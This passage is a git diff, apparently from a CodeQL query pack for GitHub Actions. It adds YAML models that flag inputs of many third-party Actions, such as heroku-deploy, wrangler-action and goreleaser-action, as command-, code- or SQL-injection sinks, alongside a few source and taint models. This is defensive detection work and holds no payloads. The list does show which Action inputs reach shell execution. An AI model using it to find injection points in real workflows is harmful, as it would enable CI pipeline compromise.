extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script","*","input.script","expression-injection"] + - ["actions/github-script", "*", "input.script", "code-injection"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index f370a9fe2228..ad65775e58d1 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -4,3 +4,18 @@ extensions: extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 000000000000..c530a3af9b3c --- /dev/null +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml new file mode 100644 index 000000000000..c632a3a1ff25 --- /dev/null +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] + - ["anchore/sbom-action", "*", "input.format", "command-injection"] + - ["anchore/sbom-action", "*", "input.path", "command-injection"] + - ["anchore/sbom-action", "*", "input.file", "command-injection"] + - ["anchore/sbom-action", "*", "input.image", "command-injection"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml new file mode 100644 index 000000000000..26e5adea505b --- /dev/null +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml new file mode 100644 index 000000000000..2903888a7318 --- /dev/null +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml new file mode 100644 index 000000000000..21dcd22c8b7f --- /dev/null +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml new file mode 100644 index 000000000000..236eade34a64 --- /dev/null +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml new file mode 100644 index 000000000000..c0e11c8201f4 --- /dev/null +++ b/ql/lib/ext/azure_powershell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml new file mode 100644 index 000000000000..2841f406bdaa --- /dev/null +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml new file mode 100644 index 000000000000..aa060de610d9 --- /dev/null +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index ee8e6abef097..7d5f699a0e98 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index c58b5a1e1d2e..aeda79986314 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml new file mode 100644 index 000000000000..38b18cf6cac8 --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5d..2e4291eb480c 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 000000000000..3be7669275c6 --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 000000000000..cb0870b4883f --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 000000000000..30e59e91d60c --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c1..f3b021d226b9 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 000000000000..25df02dacaa6 --- /dev/null +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 000000000000..2fda092f20a5 --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml new file mode 100644 index 000000000000..324171f3c4b0 --- /dev/null +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml new file mode 100644 index 000000000000..cc5c311eea73 --- /dev/null +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml new file mode 100644 index 000000000000..f45aae02158d --- /dev/null +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml new file mode 100644 index 000000000000..7445d673fcf7 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 000000000000..a8a54dbda292 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872a..82f491390d2e 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 000000000000..430a96f6cbef --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml new file mode 100644 index 000000000000..37bcf2cc7815 --- /dev/null +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml new file mode 100644 index 000000000000..77eaf3ae10f8 --- /dev/null +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml new file mode 100644 index 000000000000..63cdb2a496b0 --- /dev/null +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["endbug/latest-tag", "*", "input.ref", "command-injection"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] + - ["endbug/latest-tag", "*", "input.description", "command-injection"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml new file mode 100644 index 000000000000..d0bcbb4da989 --- /dev/null +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo-github-action", "*", "input.command", "command-injection"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml new file mode 100644 index 000000000000..6418e71f22a4 --- /dev/null +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml new file mode 100644 index 000000000000..86705319e23d --- /dev/null +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 000000000000..61fdcd9254a4 --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e9759..2d142d98099b 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 000000000000..1727ca60e258 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 000000000000..146f4a17a559 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml new file mode 100644 index 000000000000..8c0f7a5ad614 --- /dev/null +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml new file mode 100644 index 000000000000..9c7c03b9f357 --- /dev/null +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml new file mode 100644 index 000000000000..9d9eac38af01 --- /dev/null +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml new file mode 100644 index 000000000000..4c74301d1c35 --- /dev/null +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml new file mode 100644 index 000000000000..6332cbfdad8e --- /dev/null +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml new file mode 100644 index 000000000000..f8b8490c2135 --- /dev/null +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml new file mode 100644 index 000000000000..64024ef5c72d --- /dev/null +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml new file mode 100644 index 000000000000..1771ac2bad05 --- /dev/null +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml new file mode 100644 index 000000000000..e8600c6f7df5 --- /dev/null +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 000000000000..2ab70905db16 --- /dev/null +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 000000000000..948be24b45cd --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 000000000000..928c1f918d3f --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2a..ad95f1f323a7 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 000000000000..b3cb5aa39407 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 000000000000..a84880cfdf10 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 000000000000..f32484a4f0d3 --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml new file mode 100644 index 000000000000..9ce43e68a757 --- /dev/null +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["magefile/mage-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml new file mode 100644 index 000000000000..ac3aaa67def0 --- /dev/null +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection"] diff --git 